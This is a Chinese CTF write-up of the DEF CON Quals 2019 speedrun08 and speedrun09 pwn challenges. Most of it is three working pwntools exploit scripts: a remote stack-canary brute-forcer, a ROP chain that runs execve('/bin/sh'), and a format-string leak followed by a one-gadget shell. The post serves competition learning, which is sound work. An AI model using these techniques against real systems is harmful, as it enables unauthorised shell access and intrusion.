[Pwn] speedrun08-09 mf xp0int Posted on May 20 2019 ### 介绍 DefconQuals2019,难题基本不会,做了几道简单的speedrun08、speedrun09 ### speedrun08 同04,查引用找到主要逻辑,很明显的溢出,但是开了canary,所以不能直接打。 然后我们注意到,在init_array中有个函数sub_400B4D,读入了flag,并根据flag的值修改了canary,经测试,canary的值只和flag有关且固定。 我们还注意到一点,在程序输入完,结束的时候会输出"Peace out.",所以我们可以爆破canary,如果程序没有最后的输出"Peace out.",则代表canary错误。 爆破出canary之后,构造rop即可getshell。 ### speedrun09 非常简单的一道题,很明显的格式化字符串和栈溢出。同时还是动态编译的。 格式化字符串漏洞泄露信息,然后栈溢出跳onegadget即可。 ### 脚本 ```python from pwn import * # speedrun08-helper context.log_level = 'debug' canary = '\x00' # canary = '\x00\xc9\x50\x20\x31\x4a\x5c\x1e' def main(p): p.recvuntil('Yes?\n') payload = cyclic(1032) payload += canary p.send(payload) p.recvline() p.recvline() # canary错误会报错 while True: p = remote('speedrun-008.quals2019.oooverflow.io',31337) try: main(p) except: canary = canary[:-1] + chr(ord(canary[-1])+1) else: if len(canary) == 8: break canary = canary + '\x00' p.close() print(hex(u64(canary.ljust(8,'\x00')))) print('success!') ``` ```python #!/usr/bin/env python2 # -*- coding: utf-8 -*- # speedrun08 from pwn import * context.log_level = 'debug' binary = './speedrun-008' # p = process(binary) p = remote('speedrun-008.quals2019.oooverflow.io',31337) canary = '\x00\xc9\x50\x20\x31\x4a\x5c\x1e' poprax = 0x0000000000475907 poprdi = 0x0000000000400686 poprsi = 0x0000000000410253 poprdx = 0x0000000000449915 syscall = 0x0000000000474ec5 bss = 0x6BB91F rop = [ poprax, 0, poprdi, 0, poprsi, bss, poprdx, 100, syscall, poprax, 59, poprdi, bss, poprsi, 0, poprdx,0, syscall ] payload = cyclic(1032) + canary + p64(0) payload += ''.join(list(map(p64,rop))) p.send(payload) sleep(0.5) p.sendline('/bin/sh\x00') p.sendline('cat /flag\x00') p.interactive() ``` ```python #!/usr/bin/env python2 # -*- coding: utf-8 -*- # speedrun09 from pwn import * context.log_level = 'debug' binary = './speedrun-009' lib64 = '/lib/x86_64-linux-gnu/libc-2.27.so' # p = process(binary, env=env) p = remote('speedrun-009.quals2019.oooverflow.io',31337) elf = ELF(binary) libc = ELF(lib64) p.send('2') p.send('%163$lx:%169$lx:%165$lx') p.recvuntil('Is that it "') canary = int(p.recv(16),16) p.info('canary: %s' % hex(canary)) p.recv(1) libc.address = int(p.recv(12),16) - 138135 p.info('libc.address: %s' % hex(libc.address)) p.recv(1) base = int(p.recv(12),16) - 2732 p.info('base: %s' % hex(base)) p.send('1') payload = cyclic(1032) + p64(canary) + p64(0) + p64(libc.address + 0x4f2c5 ) p.send(payload) p.send('3') p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] speedrun04-06 mf [FIRST CONTACT] CANT_EVEN_UNPLUG_IT - Donek1
没有帐号? 立即注册